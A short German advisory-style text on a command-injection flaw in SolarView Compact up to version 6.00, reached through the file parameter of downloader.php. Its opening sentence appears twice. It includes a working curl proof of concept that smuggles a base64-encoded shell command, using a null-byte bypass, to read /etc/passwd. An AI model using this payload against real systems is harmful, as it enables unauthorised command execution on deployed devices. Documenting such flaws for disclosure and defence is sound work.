
Es gibt eine Command-Injection-Schwachstelle in SolarView Compact bis Version 6.00, Angreifer können Befehle ausführen, indem sie interne Einschränkungen über downloader.php umgehen.
Es gibt eine Befehlsinjektion-Schwachstelle in SolarView Compact bis Version 6.00. Angreifer können Befehle ausführen, indem sie interne Einschränkungen über downloader.php umgehen.
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
Befehle können injiziert werden, indem interne Einschränkungen durch Zugriff auf den file-Parameter der Seite downloader.php umgangen werden.
